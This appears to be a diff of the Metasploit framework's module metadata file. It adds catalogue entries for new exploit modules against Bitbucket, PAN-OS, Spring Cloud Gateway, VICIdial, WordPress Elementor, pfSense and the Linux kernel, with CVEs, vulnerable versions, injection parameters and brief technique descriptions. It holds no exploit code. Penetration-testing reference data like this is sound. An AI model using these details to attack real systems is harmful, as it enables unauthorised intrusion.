    "path": "/modules/auxiliary/scanner/http/azure_ad_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/azure_ad_login",
@@ -29674,7 +29795,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-08-31 17:10:07 +0000",
+    "mod_time": "2022-09-22 14:49:09 +0000",
    "path": "/modules/auxiliary/scanner/http/http_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/http_login",
@@ -35667,6 +35788,65 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_scanner/http/vicidial_multiple_sqli": {
+    "name": "VICIdial Multiple Authenticated SQLi",
+    "fullname": "auxiliary/scanner/http/vicidial_multiple_sqli",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2022-04-19",
+    "type": "auxiliary",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module exploits several authenticated SQL Inject vulnerabilities in VICIdial 2.14b0.5 prior to\n          svn/trunk revision 3555 (VICIBox 10.0.0, prior to January 20 is vulnerable).\n          Injection point 1 is on vicidial/admin.php when adding a user, in the modify_email_accounts parameter.\n          Injection point 2 is on vicidial/admin.php when adding a user, in the access_recordings parameter.\n          Injection point 3 is on vicidial/admin.php when adding a user, in the agentcall_email parameter.\n          Injection point 4 is on vicidial/AST_agent_time_sheet.php when adding a user, in the agent parameter.\n          Injection point 5 is on vicidial/user_stats.php when adding a user, in the file_download parameter.\n          VICIdial does not encrypt passwords by default.",
+    "references": [
+      "URL-https://www.vicidial.org/VICIDIALforum/viewtopic.php?f=4&t=41300&sid=aacb27a29fefd85265b4d55fe51122af",
+      "CVE-2022-34876",
+      "CVE-2022-34877",
+      "CVE-2022-34878"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2022-09-21 16:57:18 +0000",
+    "path": "/modules/auxiliary/scanner/http/vicidial_multiple_sqli.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/vicidial_multiple_sqli",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/http/wangkongbao_traversal": {
    "name": "WANGKONGBAO CNS-1000 and 1100 UTM Directory Traversal",
    "fullname": "auxiliary/scanner/http/wangkongbao_traversal",
@@ -42876,7 +43056,7 @@

    ],
    "targets": null,
-    "mod_time": "2018-12-12 13:57:31 +0000",
+    "mod_time": "2022-09-27 10:23:18 +0000",
    "path": "/modules/auxiliary/scanner/rservices/rexec_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/rservices/rexec_login",
@@ -42915,7 +43095,7 @@

    ],
    "targets": null,
-    "mod_time": "2018-12-12 13:57:31 +0000",
+    "mod_time": "2022-09-27 10:23:18 +0000",
    "path": "/modules/auxiliary/scanner/rservices/rlogin_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/rservices/rlogin_login",
@@ -42954,7 +43134,7 @@

    ],
    "targets": null,
-    "mod_time": "2018-12-12 13:57:31 +0000",
+    "mod_time": "2022-09-27 10:23:18 +0000",
    "path": "/modules/auxiliary/scanner/rservices/rsh_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/rservices/rsh_login",
@@ -50826,7 +51006,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-03-10 18:03:35 +0000",
+    "mod_time": "2022-08-08 01:40:15 +0000",
    "path": "/modules/auxiliary/server/ftp.rb",
    "is_install_path": true,
    "ref_name": "server/ftp",
@@ -55771,7 +55951,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-10-01 17:54:59 +0000",
    "path": "/modules/exploits/android/local/janus.rb",
    "is_install_path": true,
    "ref_name": "android/local/janus",
@@ -55780,11 +55960,14 @@
    "default_credential": false,
    "notes": {
      "SideEffects": [
-        "ARTIFACTS_ON_DISK",
-        "SCREEN_EFFECTS"
+        "artifacts-on-disk",
+        "screen-effects"
+      ],
+      "Reliability": [
+
      ],
      "Stability": [
-        "SERVICE_RESOURCE_LOSS"
+        "service-resource-loss"
      ]
    },
    "session_types": [
@@ -58487,6 +58670,72 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/bitbucket_git_cmd_injection": {
+    "name": "Bitbucket Git Command Injection",
+    "fullname": "exploit/linux/http/bitbucket_git_cmd_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-08-24",
+    "type": "exploit",
+    "author": [
+      "TheGrandPew",
+      "Ron Bowes",
+      "Jang",
+      "Shelby Pace"
+    ],
+    "description": "Various versions of Bitbucket Server and Data Center are vulnerable to\n          an unauthenticated command injection vulnerability in multiple API endpoints.\n\n          The `/rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive` endpoint\n          creates an archive of the repository, leveraging the `git-archive` command to do so.\n          Supplying NULL bytes to the request enables the passing of additional arguments to the\n          command, ultimately enabling execution of arbitrary commands.",
+    "references": [
+      "URL-https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/",
+      "URL-https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html",
+      "URL-https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804/rapid7-analysis",
+      "URL-https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/",
+      "CVE-2022-36804"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64, cmd",
+    "rport": 7990,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux Dropper",
+      "Unix Command"
+    ],
+    "mod_time": "2022-10-01 17:54:59 +0000",
+    "path": "/modules/exploits/linux/http/bitbucket_git_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/bitbucket_git_cmd_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/bludit_upload_images_exec": {
    "name": "Bludit Directory Traversal Image File Upload Vulnerability",
    "fullname": "exploit/linux/http/bludit_upload_images_exec",
@@ -61626,7 +61875,7 @@
      "CVE-2021-33553 - testcmd.cgi",
      "CVE-2021-33554 - tmpapp.cgi"
    ],
-    "mod_time": "2021-08-31 18:18:37 +0000",
+    "mod_time": "2022-10-01 17:54:59 +0000",
    "path": "/modules/exploits/linux/http/geutebruck_cmdinject_cve_2021_335xx.rb",
    "is_install_path": true,
    "ref_name": "linux/http/geutebruck_cmdinject_cve_2021_335xx",
@@ -61635,13 +61884,13 @@
    "default_credential": false,
    "notes": {
      "Stability": [
-        "CRASH_SAFE"
+        "crash-safe"
      ],
      "Reliability": [
-        "REPEATABLE_SESSION"
+        "repeatable-session"
      ],
      "SideEffects": [
-        "ARTIFACTS_ON_DISK"
+        "artifacts-on-disk"
      ]
    },
    "session_types": false,
@@ -61688,7 +61937,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2021-09-16 08:22:57 +0000",
+    "mod_time": "2022-10-01 17:54:59 +0000",
    "path": "/modules/exploits/linux/http/geutebruck_instantrec_bof.rb",
    "is_install_path": true,
    "ref_name": "linux/http/geutebruck_instantrec_bof",
@@ -61697,13 +61946,13 @@
    "default_credential": false,
    "notes": {
      "Stability": [
-        "CRASH_SAFE"
+        "crash-safe"
      ],
      "Reliability": [
-        "REPEATABLE_SESSION"
+        "repeatable-session"
      ],
      "SideEffects": [
-        "ARTIFACTS_ON_DISK"
+        "artifacts-on-disk"
      ]
    },
    "session_types": false,
@@ -65920,6 +66169,72 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/panos_op_cmd_exec": {
+    "name": "Palo Alto Networks Authenticated Remote Code Execution",
+    "fullname": "exploit/linux/http/panos_op_cmd_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-09-09",
+    "type": "exploit",
+    "author": [
+      "Mikhail Klyuchnikov",
+      "Nikita Abramov",
+      "UnD3sc0n0c1d0",
+      "jheysel-r7"
+    ],
+    "description": "An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated\n          administrators to execute arbitrary OS commands with root privileges.\n          This issue impacts PAN-OS versions < 10.0.1, < 9.1.4 and < 9.0.10",
+    "references": [
+      "CVE-2020-2038",
+      "URL-https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/",
+      "URL-https://security.paloaltonetworks.com/CVE-2020-2038",
+      "URL-https://github.com/und3sc0n0c1d0/CVE-2020-2038"
+    ],
+    "platform": "Linux",
+    "arch": "",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux ",
+      "Unix In-Memory"
+    ],
+    "mod_time": "2022-10-03 19:50:04 +0000",
+    "path": "/modules/exploits/linux/http/panos_op_cmd_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/panos_op_cmd_exec",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/panos_readsessionvars": {
    "name": "Palo Alto Networks readSessionVarsFromFile() Session Corruption",
    "fullname": "exploit/linux/http/panos_readsessionvars",
@@ -67657,6 +67972,70 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/spring_cloud_gateway_rce": {
+    "name": "Spring Cloud Gateway Remote Code Execution",
+    "fullname": "exploit/linux/http/spring_cloud_gateway_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-01-26",
+    "type": "exploit",
+    "author": [
+      "Ayan Saha"
+    ],
+    "description": "This module exploits an unauthenticated remote code execution vulnerability in Spring Cloud Gateway\n          versions = 3.1.0 and 3.0.0 to 3.0.6. The vulnerability can be exploited when the Gateway Actuator\n          endpoint is enabled, exposed and unsecured. An unauthenticated attacker can use SpEL\n          expressions to execute code and take control of the victim machine.",
+    "references": [
+      "CVE-2022-22947",
+      "URL-https://github.com/crowsec-edtech/CVE-2022-22947",
+      "URL-https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/",
+      "URL-https://tanzu.vmware.com/security/cve-2022-22947",
+      "URL-https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published"
+    ],
+    "platform": "Linux",
+    "arch": "x64, cmd",
+    "rport": 9000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux (Dropper)"
+    ],
+    "mod_time": "2022-10-12 11:19:47 +0000",
+    "path": "/modules/exploits/linux/http/spring_cloud_gateway_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/spring_cloud_gateway_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/suitecrm_log_file_rce": {
    "name": "SuiteCRM Log File Remote Code Execution",
    "fullname": "exploit/linux/http/suitecrm_log_file_rce",
@@ -72492,6 +72871,64 @@
    ],
    "needs_cleanup": true
  },
+  "exploit_linux/local/netfilter_nft_set_elem_init_privesc": {
+    "name": "Netfilter nft_set_elem_init Heap Overflow Privilege Escalation",
+    "fullname": "exploit/linux/local/netfilter_nft_set_elem_init_privesc",
+    "aliases": [
+
+    ],
+    "rank": 200,
+    "disclosure_date": "2022-02-07",
+    "type": "exploit",
+    "author": [
+      "Arthur Mongodin <amongodin <Arthur Mongodin <amongodin@randorisec.fr> (@_Aleknight_)>",
+      "Redouane NIBOUCHA <rniboucha@yahoo.fr>"
+    ],
+    "description": "An issue was discovered in the Linux kernel through 5.18.9.\n          A type confusion bug in nft_set_elem_init (leading to a buffer overflow)\n          could be used by a local attacker to escalate privileges.\n          The attacker can obtain root access, but must start with an unprivileged\n          user namespace to obtain CAP_NET_ADMIN access.\n          The issue exists in nft_setelem_parse_data in net/netfilter/nf_tables_api.c.",
+    "references": [
+      "CVE-2022-34918",
+      "URL-https://nvd.nist.gov/vuln/detail/CVE-2022-34918",
+      "URL-https://ubuntu.com/security/CVE-2022-34918",
+      "URL-https://www.randorisec.fr/crack-linux-firewall/",
+      "URL-https://github.com/randorisec/CVE-2022-34918-LPE-PoC"
+    ],
+    "platform": "Linux",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2022-09-30 09:57:54 +0000",
+    "path": "/modules/exploits/linux/local/netfilter_nft_set_elem_init_privesc.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/netfilter_nft_set_elem_init_privesc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "Stability": [
+        "os-resource-loss",
+        "crash-os-down"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": [
+      "meterpreter",
+      "shell"
+    ],
+    "needs_cleanup": true
+  },
  "exploit_linux/local/netfilter_priv_esc_ipv4": {
    "name": "Linux Kernel 4.6.3 Netfilter Privilege Escalation",
    "fullname": "exploit/linux/local/netfilter_priv_esc_ipv4",
@@ -73736,6 +74173,61 @@
    ],
    "needs_cleanup": true
  },
+  "exploit_linux/local/ubuntu_enlightenment_mount_priv_esc": {
+    "name": "Ubuntu Enlightenment Mount Priv Esc",
+    "fullname": "exploit/linux/local/ubuntu_enlightenment_mount_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 500,
+    "disclosure_date": "2022-09-13",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Maher Azzouzi"
+    ],
+    "description": "This module exploits a command injection within Enlightenment's\n          enlightenment_sys binary. This is done by calling the mount\n          command and feeding it paths which meet all of the system\n          requirements, but execute a specific path as well due to a\n          semi-colon being used.\n          This module was tested on Ubuntu 22.04.1 X64 Desktop with\n          enlightenment 0.25.3-1 (current at module write time)",
+    "references": [
+      "URL-https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit",
+      "URL-https://twitter.com/maherazz2/status/1569665311707734023",
+      "CVE-2022-37706"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2022-10-03 16:53:14 +0000",
+    "path": "/modules/exploits/linux/local/ubuntu_enlightenment_mount_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/ubuntu_enlightenment_mount_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true
+  },
  "exploit_linux/local/udev_netlink": {
    "name": "Linux udev Netlink Local Privilege Escalation",
    "fullname": "exploit/linux/local/udev_netlink",
@@ -85612,7 +86104,7 @@
      "Linux",
      "Unix CMD"
    ],
-    "mod_time": "2022-08-25 14:41:30 +0000",
+    "mod_time": "2022-09-13 16:09:28 +0000",
    "path": "/modules/exploits/multi/http/jenkins_script_console.rb",
    "is_install_path": true,
    "ref_name": "multi/http/jenkins_script_console",
@@ -90185,6 +90677,71 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_multi/http/qdpm_authenticated_rce": {
+    "name": "qdPM 9.1 Authenticated Arbitrary PHP File Upload (RCE)",
+    "fullname": "exploit/multi/http/qdpm_authenticated_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-11-21",
+    "type": "exploit",
+    "author": [
+      "Rishal Dwivedi (Loginsoft)",
+      "Leon Trappett (thepcn3rd)",
+      "Giacomo Casoni"
+    ],
+    "description": "A remote code execution (RCE) vulnerability exists in qdPM 9.1 and earlier.\n          An attacker can upload a malicious PHP code file via the profile photo functionality, by leveraging a path traversal\n          vulnerability in the users['photop_preview'] delete photo feature, allowing bypass of .htaccess protection.\n          NOTE: this issue exists because of an incomplete fix for CVE-2015-3884.",
+    "references": [
+      "CVE-2020-7246",
+      "EDB-50175"
+    ],
+    "platform": "Linux,PHP",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Generic (PHP Payload)",
+      "Linux x86",
+      "Linux x64",
+      "Windows x86",
+      "Windows x64"
+    ],
+    "mod_time": "2022-10-01 17:54:59 +0000",
+    "path": "/modules/exploits/multi/http/qdpm_authenticated_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/qdpm_authenticated_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_multi/http/qdpm_upload_exec": {
    "name": "qdPM v7 Arbitrary PHP File Upload Vulnerability",
    "fullname": "exploit/multi/http/qdpm_upload_exec",
@@ -94295,7 +94852,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2022-01-04 14:43:04 +0000",
+    "mod_time": "2022-10-03 19:50:04 +0000",
    "path": "/modules/exploits/multi/http/wp_catch_themes_demo_import.rb",
    "is_install_path": true,
    "ref_name": "multi/http/wp_catch_themes_demo_import",
@@ -94651,6 +95208,70 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_multi/http/wp_plugin_elementor_auth_upload_rce": {
+    "name": "Wordpress Plugin Elementor Authenticated Upload Remote Code Execution",
+    "fullname": "exploit/multi/http/wp_plugin_elementor_auth_upload_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-03-29",
+    "type": "exploit",
+    "author": [
+      "Ramuel Gall",
+      "AkuCyberSec",
+      "h00die"
+    ],
+    "description": "The WordPress plugin Elementor versions 3.6.0 - 3.6.2, inclusive have a vulnerability\n          that allows any authenticated user to upload and execute any PHP file. This is achieved\n          by sending a request to install Elementor Pro from a user supplied zip file.\n          Any user with Subscriber or more permissions is able to execute this.\n          Tested against Elementor 3.6.1",
+    "references": [
+      "EDB-50115",
+      "CVE-2022-1329",
+      "URL-https://www.wordfence.com/blog/2022/04/elementor-critical-remote-code-execution-vulnerability/",
+      "URL-https://www.youtube.com/watch?v=tIhN1svzAYk"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Wordpress Elementor"
+    ],
+    "mod_time": "2022-10-03 14:43:12 +0000",
+    "path": "/modules/exploits/multi/http/wp_plugin_elementor_auth_upload_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/wp_plugin_elementor_auth_upload_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_multi/http/wp_plugin_modern_events_calendar_rce": {
    "name": "Wordpress Plugin Modern Events Calendar - Authenticated Remote Code Execution",
    "fullname": "exploit/multi/http/wp_plugin_modern_events_calendar_rce",
@@ -94819,7 +95440,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2021-12-08 16:45:19 +0000",
+    "mod_time": "2022-10-03 19:50:04 +0000",
    "path": "/modules/exploits/multi/http/wp_popular_posts_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/wp_popular_posts_rce",
@@ -98001,7 +98622,7 @@
      "Unix (In-Memory)",
      "Windows (In-Memory)"
    ],
-    "mod_time": "2022-02-15 08:47:50 +0000",
+    "mod_time": "2022-09-13 22:36:31 +0000",
    "path": "/modules/exploits/multi/php/ignition_laravel_debug_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/php/ignition_laravel_debug_rce",
@@ -98857,6 +99478,60 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/veritas/beagent_sha_auth_rce": {
+    "name": "Veritas Backup Exec Agent Remote Code Execution",
+    "fullname": "exploit/multi/veritas/beagent_sha_auth_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2021-03-01",
+    "type": "exploit",
+    "author": [
+      "Alexander Korotin <0xc0rs@gmail.com>"
+    ],
+    "description": "Veritas Backup Exec Agent supports multiple authentication schemes and SHA authentication is one of them.\n          This authentication scheme is no longer used within Backup Exec versions, but hadn’t yet been disabled.\n          An attacker could remotely exploit the SHA authentication scheme to gain unauthorized access to\n          the BE Agent and execute an arbitrary OS command on the host with NT AUTHORITY\\SYSTEM or root privileges\n          depending on the platform.\n\n          The vulnerability presents in 16.x, 20.x and 21.x versions of Backup Exec up to 21.2 (or up to and\n          including Backup Exec Remote Agent revision 9.3)",
+    "references": [
+      "CVE-2021-27876",
+      "CVE-2021-27877",
+      "CVE-2021-27878",
+      "URL-https://www.veritas.com/content/support/en_US/security/VTS21-001"
+    ],
+    "platform": "Linux,Windows",
+    "arch": "",
+    "rport": 10000,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows",
+      "Linux"
+    ],
+    "mod_time": "2022-09-27 16:23:05 +0000",
+    "path": "/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/veritas/beagent_sha_auth_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/vnc/vnc_keyboard_exec": {
    "name": "VNC Keyboard Remote Code Execution",
    "fullname": "exploit/multi/vnc/vnc_keyboard_exec",
@@ -102851,6 +103526,68 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_unix/http/pfsense_pfblockerng_webshell": {
+    "name": "pfSense plugin pfBlockerNG unauthenticated RCE as root",
+    "fullname": "exploit/unix/http/pfsense_pfblockerng_webshell",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-09-05",
+    "type": "exploit",
+    "author": [
+      "IHTeam",
+      "jheysel-r7"
+    ],
+    "description": "pfBlockerNG is a popular pfSense plugin that is not installed by default. It’s generally used to\n          block inbound connections from whole countries or IP ranges. Versions 2.1.4_26 and below are affected\n          by an unauthenticated RCE vulnerability that results in root access. Note that version 3.x is unaffected.",
+    "references": [
+      "CVE-2022-31814",
+      "URL-https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "BSD Dropper"
+    ],
+    "mod_time": "2022-10-12 19:23:59 +0000",
+    "path": "/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb",
+    "is_install_path": true,
+    "ref_name": "unix/http/pfsense_pfblockerng_webshell",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-service-down"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_unix/http/pihole_blocklist_exec": {
    "name": "Pi-Hole heisenbergCompensator Blocklist OS Command Execution",
    "fullname": "exploit/unix/http/pihole_blocklist_exec",
@@ -102893,7 +103630,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2022-05-04 19:42:39 +0000",
+    "mod_time": "2022-10-03 19:50:04 +0000",
    "path": "/modules/exploits/unix/http/pihole_blocklist_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/http/pihole_blocklist_exec",
@@ -102954,7 +103691,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2022-05-04 19:42:39 +0000",
+    "mod_time": "2022-10-03 19:50:04 +0000",
    "path": "/modules/exploits/unix/http/pihole_dhcp_mac_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/http/pihole_dhcp_mac_exec",
@@ -103016,7 +103753,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2022-05-04 19:42:39 +0000",
+    "mod_time": "2022-10-03 19:50:04 +0000",
    "path": "/modules/exploits/unix/http/pihole_whitelist_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/http/pihole_whitelist_exec",
@@ -111542,7 +112279,7 @@
    "targets": [
      "WordPress"
    ],
-    "mod_time": "2021-10-11 16:44:32 +0000",
+    "mod_time": "2022-10-03 19:50:04 +0000",
    "path": "/modules/exploits/unix/webapp/wp_pie_register_bypass_rce.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/wp_pie_register_bypass_rce",
@@ -134588,7 +135325,7 @@
      "Windows XP SP2 ENG",
      "Windows XP SP3 ENG"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-08-08 01:40:15 +0000",
    "path": "/modules/exploits/windows/ftp/ability_server_stor.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/ability_server_stor",
@@ -135268,7 +136005,7 @@
    "targets": [
      "freeFTPd 1.0.10 and below on Windows Desktop Version"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-08-08 01:40:15 +0000",
    "path": "/modules/exploits/windows/ftp/freeftpd_pass.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/freeftpd_pass",
@@ -135707,7 +136444,7 @@
      "httpdx 1.4.6b - Windows XP SP3 English",
      "httpdx 1.5 - Windows XP SP3 English"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-08-08 01:40:15 +0000",
    "path": "/modules/exploits/windows/ftp/httpdx_tolog_format.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/httpdx_tolog_format",
@@ -136150,7 +136887,7 @@
    "targets": [
      "Oracle 9.2.0.1 Universal"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-08-08 01:40:15 +0000",
    "path": "/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/oracle9i_xdb_ftp_unlock",
@@ -143868,7 +144605,7 @@
    "needs_cleanup": null
  },
  "exploit_windows/http/manageengine_adshacluster_rce": {
-    "name": "Manage Engine Exchange Reporter Plus Unauthenticated RCE",
+    "name": "ManageEngine Exchange Reporter Plus Unauthenticated RCE",
    "fullname": "exploit/windows/http/manageengine_adshacluster_rce",
    "aliases": [

@@ -143881,7 +144618,7 @@
    ],
    "description": "This module exploits a remote code execution vulnerability that\n        exists in Exchange Reporter Plus <= 5310, caused by execution of\n        bcp.exe file inside ADSHACluster servlet",
    "references": [
-      "URL-https://security.szurek.pl/manage-engine-exchange-reporter-plus-unauthenticated-rce.html"
+      "URL-https://security.szurek.pl/en/manage-engine-exchange-reporter-plus-unauthenticated-rce/"
    ],
    "platform": "Windows",
    "arch": "x86, x64",
@@ -143904,7 +144641,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-10-07 01:59:52 +0000",
    "path": "/modules/exploits/windows/http/manageengine_adshacluster_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/http/manageengine_adshacluster_rce",
@@ -154332,7 +155069,7 @@
    "targets": [
      "Automatic"
    ],
